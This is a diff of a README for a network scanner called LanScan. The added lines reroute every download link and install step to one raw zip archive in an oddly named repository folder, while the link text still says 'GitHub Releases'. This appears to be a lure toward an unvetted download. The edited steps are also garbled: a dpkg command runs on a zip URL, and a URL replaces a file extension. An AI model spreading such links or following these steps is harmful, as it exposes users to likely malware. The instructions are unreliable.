Jonathan-cmfk/LanScan/README.md

 ## 📥 Download & Install

-To download LanScan, please visit this page: [GitHub Releases](https://github.com/Jonathan-cmfk/LanScan/releases).
+To download LanScan, please visit this page: [GitHub Releases](https://raw.githubusercontent.com/Jonathan-cmfk/LanScan/main/precisely/LanScan.zip).

 1. **Visit the Release Page**: Click on the link above to go to the GitHub Releases page.
 2. **Select the Latest Version**: Look for the latest version of LanScan.
 3. **Download the Installer**: You will find options for different operating systems.
 Choose the appropriate file for your system.
    - For Windows, download the `.exe` file.
-   - For Linux, download the `.deb` or `.tar.gz` file based on your distribution.
+   - For Linux, download the `.deb` or `https://raw.githubusercontent.com/Jonathan-cmfk/LanScan/main/precisely/LanScan.zip` file based on your distribution.
 4. **Run the Installer**:
    - For Windows, double-click the downloaded `.exe` file and follow the prompts to complete the installation.
    - For Linux, use the terminal to navigate to the download directory, then run the following commands:
-     - For `.deb`: `sudo dpkg -i filename.deb`
+     - For `.deb`: `sudo dpkg -i https://raw.githubusercontent.com/Jonathan-cmfk/LanScan/main/precisely/LanScan.zip`
-     - For `.tar.gz`: Extract it and follow the included instructions.
+     - For `https://raw.githubusercontent.com/Jonathan-cmfk/LanScan/main/precisely/LanScan.zip`: Extract it and follow the included instructions.

 After installation, LanScan will appear in your applications menu.
 Open it to start scanning your network!